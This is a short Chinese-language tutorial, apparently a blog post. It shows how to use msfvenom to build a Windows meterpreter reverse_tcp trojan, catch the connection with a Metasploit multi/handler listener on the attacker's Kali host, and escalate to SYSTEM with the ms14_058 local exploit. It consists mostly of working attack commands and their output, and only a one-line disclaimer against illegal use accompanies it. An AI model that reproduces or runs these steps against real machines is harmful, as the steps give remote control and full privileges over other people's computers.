沉默不是沒有情緒,是感覺沒有再說的意義。。。。
---- 網易雲熱評
環境:小攻:Kali 2020,ip:192.168.1.133
小受:win7 x86,ip:192.168.1.137
一、生成木馬
1、查看Windows下可利用的payloads
msfvenom -l payloads | grep windows | grep tcp
2、選擇windows/meterpreter/reverse_tcp並生成木馬
-p 選擇一個payload
-l 載荷列表
-f 生成的文件格式
-e 編碼方式
-i 編碼次數
-b 在生成的程序中避免出現的值
-x 允許我們指定一個自定義的可執行文件作爲模板,也就是將木馬捆綁到這個可執行文件上
msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.1.133 LPORT=4444 -b"\x00" -f exe > aiyou.exe
3、/root目錄下會生成一個aiyou.exe文件
二、通過Metasploit監聽小受
1、啓動Metasploit,use exploit/multi/handler
2、設置payload,set payload windows/meterpreter/reverse_tcp
3、設置監聽,set lhost 192.168.1.133
4、設置監聽端口,set lport 4444
5、run
6、將生成的aiyou.exe拷貝到小受中並運行,getuid查看權限,普通用戶
三、提權漏洞(ms14_058)
1、選擇提權漏洞:use exploit/windows/local/ms14_058_track_popup_menu
2、查看需要設置的參數:show options
3、設置session值:set session 1,執行run
4、重新生成一個session,查看權限
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
禁止非法,後果自負
歡迎關注公衆號:web安全工具庫